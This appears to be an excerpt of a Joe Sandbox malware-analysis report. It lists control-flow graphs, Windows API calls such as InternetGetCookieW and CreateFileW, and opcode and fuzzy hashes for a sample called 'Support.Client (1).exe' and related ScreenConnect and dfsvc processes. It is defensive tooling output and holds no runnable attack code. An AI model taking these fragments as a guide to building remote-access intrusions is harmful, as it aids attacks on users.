                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2278895681-0
                                                                                                                          • Opcode ID: 8cdb0557051e7fd77cc6ebd302282be0229f4a4a83e4e32c1d765c53b568d41f
                                                                                                                          • Instruction ID: eadfc8934c9cb24c38522197164ea00875a451862ca61cd224627f82736855a6
                                                                                                                          • Opcode Fuzzy Hash: 8cdb0557051e7fd77cc6ebd302282be0229f4a4a83e4e32c1d765c53b568d41f
                                                                                                                          • Instruction Fuzzy Hash: 4E01D472601B55BF27211AAA5C4CCFBAA6FDEC7BA135E012EF806C3210EB608C4191F1

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 447 6144a8-6144bf GetLastError 448 6144c1-6144cb call 615904 447->448 449 6144cd-6144d2 447->449 448->449 454 61451e-614525 SetLastError 448->454 451 6144d4 call 61480c 449->451 453 6144d9-6144df 451->453 455 6144e1 453->455 456 6144ea-6144f8 call 61595a 453->456 457 614527-61452c 454->457 458 6144e2-6144e8 call 614869 455->458 463 6144fa-6144fb 456->463 464 6144fd-614513 call 614296 call 614869 456->464 465 614515-61451c SetLastError 458->465 463->458 464->454 464->465 465->457
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,?,?,006147FE,00617E79,?,0061686F,?,00000004,00000000,?,?,?,00613BCD,?,00000000), ref: 006144AD
                                                                                                                          • _free.LIBCMT ref: 006144E2
                                                                                                                          • _free.LIBCMT ref: 00614509
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00614516
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0061451F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3170660625-0
                                                                                                                          • Opcode ID: a74197c66d6f0383224b0c04ba0d2e3d98595850c6be8622f053c4684b732bc8
                                                                                                                          • Instruction ID: 5b2f02fe039ac2d95b3917e83ad6f2cb374d534e2a3b55184a975b31dc6b38ef
                                                                                                                          • Opcode Fuzzy Hash: a74197c66d6f0383224b0c04ba0d2e3d98595850c6be8622f053c4684b732bc8
                                                                                                                          • Instruction Fuzzy Hash: DA012D36200A40AB8362AB356C85EEB126FEBD577272C5029F519E3282EF74CDC25024

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 470 616176-616181 471 616183-61618b 470->471 472 6161dc-6161de 470->472 473 616194-61619d 471->473 474 61618d-616193 call 614869 471->474 476 6161a6-6161af 473->476 477 61619f-6161a5 call 614869 473->477 474->473 480 6161b1-6161b7 call 614869 476->480 481 6161b8-6161c1 476->481 477->476 480->481 484 6161c3-6161c9 call 614869 481->484 485 6161ca-6161d3 481->485 484->485 485->472 487 6161d5-6161db call 614869 485->487 487->472
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 0061618E
                                                                                                                            • Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
                                                                                                                            • Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891
                                                                                                                          • _free.LIBCMT ref: 006161A0
                                                                                                                          • _free.LIBCMT ref: 006161B2
                                                                                                                          • _free.LIBCMT ref: 006161C4
                                                                                                                          • _free.LIBCMT ref: 006161D6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: b2de649b8daaf4e718a67f5bff5b85b271233150e449b9cfc158ac098df4d1f8
                                                                                                                          • Instruction ID: 44393eef78a5ce685229b206a0c5549fb7c084c989ea625649710c39ebebea1a
                                                                                                                          • Opcode Fuzzy Hash: b2de649b8daaf4e718a67f5bff5b85b271233150e449b9cfc158ac098df4d1f8
                                                                                                                          • Instruction Fuzzy Hash: 7CF06236618690BF87F0EB59F996CDA77EFAA51B1035C0819F40ADB692CB30FCC08654
                                                                                                                          APIs
                                                                                                                          • _free.LIBCMT ref: 00613DAD
                                                                                                                            • Part of subcall function 00614869: HeapFree.KERNEL32(00000000,00000000,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?), ref: 0061487F
                                                                                                                            • Part of subcall function 00614869: GetLastError.KERNEL32(?,?,0061620D,?,00000000,?,00000000,?,00616234,?,00000007,?,?,0061669F,?,?), ref: 00614891
                                                                                                                          • _free.LIBCMT ref: 00613DBF
                                                                                                                          • _free.LIBCMT ref: 00613DD2
                                                                                                                          • _free.LIBCMT ref: 00613DE3
                                                                                                                          • _free.LIBCMT ref: 00613DF4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: f2e02130b39b3ccd9f3e91f7fb76721adfb9343a9911479267cb669e84881d9f
                                                                                                                          • Instruction ID: c00b73947c8681b7eda488d377b6772a41bb4c0acb7a273a70ad74e3ee763b2a
                                                                                                                          • Opcode Fuzzy Hash: f2e02130b39b3ccd9f3e91f7fb76721adfb9343a9911479267cb669e84881d9f
                                                                                                                          • Instruction Fuzzy Hash: 41F06D78818AA0EB87E16F15FC018C43B23AB66710348266AF5025F3B4CB344592CAC5
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Support.Client (1).exe,00000104), ref: 00612F93
                                                                                                                          • _free.LIBCMT ref: 0061305E
                                                                                                                          • _free.LIBCMT ref: 00613068
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                          • String ID: C:\Users\user\Desktop\Support.Client (1).exe
                                                                                                                          • API String ID: 2506810119-452514669
                                                                                                                          • Opcode ID: d9e430876050cbb0078b2a0306a250be5cb751ece8b36e9475dcd54fb29c658c
                                                                                                                          • Instruction ID: 1cfe9f036f5678036a6a2d377903195bf40ebd8bdf6d22b7e7120fe7b561da97
                                                                                                                          • Opcode Fuzzy Hash: d9e430876050cbb0078b2a0306a250be5cb751ece8b36e9475dcd54fb29c658c
                                                                                                                          • Instruction Fuzzy Hash: 8C317071A04258EFCB21DF9998819DEBBFEEF99710F18406AE4059B311D6708A82CB51
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00612594,00000000,?,00621B50,?,?,?,00612737,00000004,InitializeCriticalSectionEx,0061BC48,InitializeCriticalSectionEx), ref: 006125F0
                                                                                                                          • GetLastError.KERNEL32(?,00612594,00000000,?,00621B50,?,?,?,00612737,00000004,InitializeCriticalSectionEx,0061BC48,InitializeCriticalSectionEx,00000000,?,006124C7), ref: 006125FA
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00612622
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID: api-ms-
                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                          • Opcode ID: 499ed4e0449a35db4cc35da5433b9da295b7ec48ddcc9edbe12410be3fbb7c8a
                                                                                                                          • Instruction ID: 2a71e108e2e299e65505573024aec73b074c64c0b6af18f8f440c4575bf285b4
                                                                                                                          • Opcode Fuzzy Hash: 499ed4e0449a35db4cc35da5433b9da295b7ec48ddcc9edbe12410be3fbb7c8a
                                                                                                                          • Instruction Fuzzy Hash: 28E01270644205BBDF111B71EC06BD93B56AB14B52F185421F90DA41E1EBA19AA49984
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00615784,00000000,00000000,00000000,00000000,?,00615981,00000006,FlsSetValue), ref: 0061580F
                                                                                                                          • GetLastError.KERNEL32(?,00615784,00000000,00000000,00000000,00000000,?,00615981,00000006,FlsSetValue,0061C4D8,FlsSetValue,00000000,00000364,?,006144F6), ref: 0061581B
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00615784,00000000,00000000,00000000,00000000,?,00615981,00000006,FlsSetValue,0061C4D8,FlsSetValue,00000000), ref: 00615829
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3177248105-0
                                                                                                                          • Opcode ID: 86d20d321a33c1de88e69ce6ed7272e4eacafbbf88c8314bb46387b33e699f70
                                                                                                                          • Instruction ID: 6818816e82ce7cec2627fd9537c7d53e0b5929d2ef0f0aa395d0058c38b77698
                                                                                                                          • Opcode Fuzzy Hash: 86d20d321a33c1de88e69ce6ed7272e4eacafbbf88c8314bb46387b33e699f70
                                                                                                                          • Instruction Fuzzy Hash: 7F014C32615632EFC7604A789C44AD7B75EAF887A1B185525F917D7240C720C841CAE0
                                                                                                                          APIs
                                                                                                                          • GetOEMCP.KERNEL32(00000000,?,?,00615147,?), ref: 00614EE9
                                                                                                                          • GetACP.KERNEL32(00000000,?,?,00615147,?), ref: 00614F00
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_610000_Support.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: GQa
                                                                                                                          • API String ID: 0-327253900
                                                                                                                          • Opcode ID: 3f07086856eb24bcef9b7f0343bc096588047b297b24269a21cefd99733ae06d
                                                                                                                          • Instruction ID: 892f55d0d20a75df7b444941bf4a04006cfa3f09b019e541acd97f92fbe3e124
                                                                                                                          • Opcode Fuzzy Hash: 3f07086856eb24bcef9b7f0343bc096588047b297b24269a21cefd99733ae06d
                                                                                                                          • Instruction Fuzzy Hash: D7F08C70804504DFCB309B68DC087E87772AB91329F585748E4358F6E1CB7198838B51

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:12.6%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:11
                                                                                                                          Total number of Limit Nodes:1
                                                                                                                          execution_graph 26197 7ffd9b891658 26199 7ffd9b891661 26197->26199 26198 7ffd9b891683 26199->26198 26200 7ffd9b891802 LoadLibraryExW 26199->26200 26201 7ffd9b891836 26200->26201 26202 7ffd9b8999db 26203 7ffd9b8999e7 CreateFileW 26202->26203 26205 7ffd9b899b1c 26203->26205 26206 7ffd9b89e8c2 26209 7ffd9b89e8ef InternetGetCookieW 26206->26209 26208 7ffd9b89eab9 26209->26208

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.2550265591.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CookieInternet
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 930238652-0
                                                                                                                          • Opcode ID: 53ebd8a3c5f3e14442ef7196776692721969e8d0b02525c9071feb74380b7d29
                                                                                                                          • Instruction ID: 6a9e3866f245c0b89193f00394240c1daaaafa280a8b2dce712bd1d38b288314
                                                                                                                          • Opcode Fuzzy Hash: 53ebd8a3c5f3e14442ef7196776692721969e8d0b02525c9071feb74380b7d29
                                                                                                                          • Instruction Fuzzy Hash: 88910330608A8D8FEB69DF28C8557E53BE1FF59311F04426FE84DC72A2CB74A9458B81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 960 7ffd9b8999db-7ffd9b899a70 966 7ffd9b899a7a-7ffd9b899b1a CreateFileW 960->966 967 7ffd9b899a72-7ffd9b899a77 960->967 969 7ffd9b899b1c 966->969 970 7ffd9b899b22-7ffd9b899b55 966->970 967->966 969->970
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.2550265591.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 43ab2079482a4145c88190bf005688eca6a9ce729314c8afc8ce5049d4f0b79a
                                                                                                                          • Instruction ID: 8c26d04ca6e36c80f6183daa3066585367bd62589cd47890cdd0cc57f3d81d19
                                                                                                                          • Opcode Fuzzy Hash: 43ab2079482a4145c88190bf005688eca6a9ce729314c8afc8ce5049d4f0b79a
                                                                                                                          • Instruction Fuzzy Hash: D251AF7190CA4C8FDB68DF58D859BA9BBE0FF59310F1442AEE04DD3252CB34A8858B81

                                                                                                                          Control-flow Graph

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.2550265591.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b890000_dfsvc.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 38343efdfbb921e40bff9a2763b7ad1934e55b818d71f08f43370fcbca19006b
                                                                                                                          • Instruction ID: 00f22de2fe91660cbbd1d3f8379ad52f15a34ec899fddf329f33330dc092edfb
                                                                                                                          • Opcode Fuzzy Hash: 38343efdfbb921e40bff9a2763b7ad1934e55b818d71f08f43370fcbca19006b
                                                                                                                          • Instruction Fuzzy Hash: 0141C431A0CA4D9FDB59EB688859AB97BE1EF59310F04426FD04ED3292DF74A806C781
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.2549680471.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7ffd9b77d000_dfsvc.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c8dfe9621a20fdd280a99e9d256752b6eb2e5d3822a14944b64bcb25080f862c
                                                                                                                          • Instruction ID: 2d421e7b0f3a9e5a72a53b1d0a86e3eeb7b568777ae9677c09e274a049940355
                                                                                                                          • Opcode Fuzzy Hash: c8dfe9621a20fdd280a99e9d256752b6eb2e5d3822a14944b64bcb25080f862c
                                                                                                                          • Instruction Fuzzy Hash: F141147190EBC84FE396CB3898959523FF0EF56320B1506EFD088CB1B3D665A846C792

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:14.6%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:12
                                                                                                                          Total number of Limit Nodes:0

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 219 7ffd9b89f67b-7ffd9b89f710 224 7ffd9b89f71a-7ffd9b89f7ba CreateFileW 219->224 225 7ffd9b89f712-7ffd9b89f717 219->225 227 7ffd9b89f7bc 224->227 228 7ffd9b89f7c2-7ffd9b89f7f5 224->228 225->224 227->228
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 633f6621c10eb0ca00761c734088de0951abfc54c2a9ac2456ba1891e7edf302
                                                                                                                          • Instruction ID: f44dff7d088c71e915b2383224004343df179a866016f8060c7e57085879909c
                                                                                                                          • Opcode Fuzzy Hash: 633f6621c10eb0ca00761c734088de0951abfc54c2a9ac2456ba1891e7edf302
                                                                                                                          • Instruction Fuzzy Hash: 3951BF71A0CA5C9FDB68DF58D845BA8BBE0FB59310F1442AEE04DD3252CB34A885CB81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 230 7ffd9b894992-7ffd9b8af2b5 GetTokenInformation 233 7ffd9b8af2b7 230->233 234 7ffd9b8af2bd-7ffd9b8af2ee 230->234 233->234
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InformationToken
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4114910276-0
                                                                                                                          • Opcode ID: 5cd9a6a29e3e669174f1cfbdd6ec8ed197fa5d2b4c2dac6424a1eab55649124e
                                                                                                                          • Instruction ID: d11d40c12e0ce0537f4c5e28951dc6dbf931bab2f2f4d0953132482960f0a176
                                                                                                                          • Opcode Fuzzy Hash: 5cd9a6a29e3e669174f1cfbdd6ec8ed197fa5d2b4c2dac6424a1eab55649124e
                                                                                                                          • Instruction Fuzzy Hash: 9631C27191CB188FDB1CDF9CE8466FD77E0EB99321F10422EE049D3252DB74A8068B96

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 236 7ffd9b893eaa-7ffd9b8984ef 238 7ffd9b8984f6-7ffd9b898550 SetProcessMitigationPolicy 236->238 239 7ffd9b898558-7ffd9b898587 238->239 240 7ffd9b898552 238->240 240->239
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1088084561-0
                                                                                                                          • Opcode ID: 6d7953a237a61f22582d919ef82eba38cdd1e0ee98bfd54af01f4feeb91be25f
                                                                                                                          • Instruction ID: 4057da36f3fd61b1dca1522dc108e480ef9a488bbd7d416996a9a30966981e05
                                                                                                                          • Opcode Fuzzy Hash: 6d7953a237a61f22582d919ef82eba38cdd1e0ee98bfd54af01f4feeb91be25f
                                                                                                                          • Instruction Fuzzy Hash: 7521E97191CB188FDB289F9DDC4A9F97BE0EB59711F00413EE049D3251DB74B8468B81

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 242 7ffd9b8984b8-7ffd9b898550 SetProcessMitigationPolicy 244 7ffd9b898558-7ffd9b898587 242->244 245 7ffd9b898552 242->245 245->244
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1088084561-0
                                                                                                                          • Opcode ID: f56acb01f5454c3450a8575b682988f43b0e0d4a70de1cd34668e27c6da9dc21
                                                                                                                          • Instruction ID: a5a7dba11d6690a301fc092e67294fa205bdbe178ce6f5b3b7d8fe31adc48a1e
                                                                                                                          • Opcode Fuzzy Hash: f56acb01f5454c3450a8575b682988f43b0e0d4a70de1cd34668e27c6da9dc21
                                                                                                                          • Instruction Fuzzy Hash: 5431D77191CB188FDB28DF9D9C4A9F97BE0EB59711F00422FE059D3251DB74A845CB82

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 305 7ffd9b893dfa-7ffd9b8af4c9 CloseHandle 308 7ffd9b8af4cb 305->308 309 7ffd9b8af4d1-7ffd9b8af4ff 305->309 308->309
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.1974120602.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_7ffd9b890000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2962429428-0
                                                                                                                          • Opcode ID: 45a664af4997c563ec1763d6903171a38fc961a42c3b302293a7c36bbe2ee9b0
                                                                                                                          • Instruction ID: fd444494bea838da8cbb86f7265b897ee41f93b885b2ba80882d50f4f3a0b630
                                                                                                                          • Opcode Fuzzy Hash: 45a664af4997c563ec1763d6903171a38fc961a42c3b302293a7c36bbe2ee9b0
                                                                                                                          • Instruction Fuzzy Hash: BA21D331A08A1C9FDB5CDF98D449BF97BE0EB69321F00422ED04DD3651DB74A856CB90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: nCvq$
                                                                                                                          • API String ID: 0-222869378
                                                                                                                          • Opcode ID: f1b809dc78207ae5caa7f8022da51738df6a9bfe88c94b61806a19a9f02d843a
                                                                                                                          • Instruction ID: b52049555a3f54c5a614feb61533fa7a980f60b2c1159d02ba0aa38eaadec9ad
                                                                                                                          • Opcode Fuzzy Hash: f1b809dc78207ae5caa7f8022da51738df6a9bfe88c94b61806a19a9f02d843a
                                                                                                                          • Instruction Fuzzy Hash: D851D5307002168FC715EB39D8646AEBBF2EF8A314B1484AAD40ADB365EF75DD01CB91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $^q$$^q
                                                                                                                          • API String ID: 0-355816377
                                                                                                                          • Opcode ID: 87f28e4a63a9e47557351f99ab89fa6e576de9eb0a169c2863bc9bacaae18cd6
                                                                                                                          • Instruction ID: bd5e992014de08479105a9a97b246c274c75401b703ec122950b63c5951fbe2a
                                                                                                                          • Opcode Fuzzy Hash: 87f28e4a63a9e47557351f99ab89fa6e576de9eb0a169c2863bc9bacaae18cd6
                                                                                                                          • Instruction Fuzzy Hash: 7901B130609344CFD7066B34D41C8193FB1EF4B61571A48EAD8098B266CF359C45CF56
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000A.00000002.1964672239.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_10_2_ca0000_ScreenConnect.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
